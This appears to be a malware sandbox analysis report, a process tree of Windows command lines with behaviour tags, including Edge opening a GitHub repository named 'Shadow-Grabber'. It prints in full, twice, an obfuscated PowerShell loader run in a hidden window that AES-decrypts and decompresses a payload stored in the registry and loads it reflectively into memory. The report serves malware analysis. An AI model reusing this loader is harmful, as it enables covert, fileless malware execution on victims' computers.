C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))4⤵
- Hide Artifacts: Hidden Window
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{4c331552-2ca5-40d5-823f-ac583a42d04b}5⤵
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5684).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))5⤵
- Hide Artifacts: Hidden Window
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{68cf8a46-b33f-4fe2-ba56-6c3aa35b7ce0}5⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Excalisz/Shadow-Grabber-2⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb6ecd3cb8,0x7ffb6ecd3cc8,0x7ffb6ecd3cd83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2336 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3976 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:13⤵
-
